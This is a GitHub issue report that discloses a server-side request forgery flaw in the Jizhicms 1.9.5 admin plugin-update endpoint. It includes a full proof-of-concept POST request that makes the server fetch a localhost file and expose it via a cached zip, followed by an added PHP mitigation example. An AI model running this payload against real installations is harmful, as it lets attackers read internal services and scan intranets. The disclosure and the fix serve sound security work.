
V1.9.5: SSRF Vulnerability #67

Closed
b1ackc4t opened this issue Mar 18, 2022 · 2 comments

Comments


b1ackc4t commented Mar 18, 2022

An SSRF vulnerability with echo exists in the CMS admin background. Attackers can use this vulnerability to scan local and intranet ports and attack local and intranet Jizhicms backgrounds. Attackers can also use it to attack local and intranet services, or to carry out DoS attacks.

The vulnerability is located in the background plug-in download function.

I started a locally accessible web service with a flag.php file.

[screenshot]

[screenshot]

Use the payload:

POST /admin.php/Plugins/update.html HTTP/1.1
Host: 192.168.48.135
Content-Length: 93
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.48.135
Referer: http://192.168.48.135//admin.php/Plugins/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=821f3d50fa8cd84139c76be9
Connection: close

action=start-download&filepath=mutisite&download_url=http%3a%2f%2f127.0.0.1%3a8888%2fflag.php

See the response:

[screenshot]

Browser access: http://192.168.48.135/cache/update_mutisite.zip

[screenshot]

Open with Notepad:

[screenshot]

It is the same as flag.php; it was read successfully.
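A server-side check of the kind that closes this class of bug, written here as an added example and not taken from the Jizhicms code base: it allowlists the download host, rejects non-http(s) schemes and loopback, private and link-local addresses, resolves the name once and pins the fetch to that vetted IP so a redirect or DNS rebind cannot re-target localhost. The allowlisted host, the function names and the destination path are assumptions.

```php
<?php
// Added example, not Jizhicms code. Validates the admin-supplied download_url
// before the server fetches it, so "start-download" cannot reach 127.0.0.1 or
// intranet hosts. ALLOWED_DOWNLOAD_HOSTS is a placeholder allowlist.
const ALLOWED_DOWNLOAD_HOSTS = ['plugins.example.com'];

function is_public_ip(string $ip): bool {
    // Fails for 10/8, 172.16/12, 192.168/16, 127/8, 169.254/16, 0/8, ::1, fc00::/7, fe80::/10
    return filter_var($ip, FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false;
}

// Returns the vetted IP to pin the connection to, or null to refuse the URL.
function validate_download_url(string $url): ?string {
    $p = parse_url($url);
    if ($p === false || empty($p['scheme']) || empty($p['host'])) return null;
    if (!in_array(strtolower($p['scheme']), ['http', 'https'], true)) return null; // no file:, gopher:, dict:
    if (isset($p['user']) || isset($p['pass'])) return null;   // userinfo confusion, e.g. http://host@127.0.0.1
    $host = strtolower($p['host']);
    if (!in_array($host, ALLOWED_DOWNLOAD_HOSTS, true)) return null;
    $ip = trim($host, '[]');                                   // parse_url keeps IPv6 brackets
    if (filter_var($ip, FILTER_VALIDATE_IP) === false) {
        $ip = gethostbyname($host);                            // returns the name unchanged on failure
        if ($ip === $host) return null;
    }
    return is_public_ip($ip) ? $ip : null;                     // resolve once, then pin below
}

function fetch_plugin(string $url, string $dest): bool {
    $ip = validate_download_url($url);
    if ($ip === null) return false;
    $p = parse_url($url);
    $port = $p['port'] ?? (strtolower($p['scheme']) === 'https' ? 443 : 80);
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => false,                          // a redirect could re-target localhost
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_RESOLVE        => ["{$p['host']}:{$port}:{$ip}"],  // use the vetted IP, not a fresh lookup
        CURLOPT_TIMEOUT        => 30,
    ]);
    $body = curl_exec($ch);
    $status = curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
    curl_close($ch);
    if ($body === false || $status !== 200) return false;
    // $dest should live outside the web root, unlike the cache/update_*.zip path shown above.
    return file_put_contents($dest, $body) !== false;
}
```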

Cherry-toto (Owner) commented Mar 18, 2022 via email

b1ackc4t (Author) commented:

OK, understood.
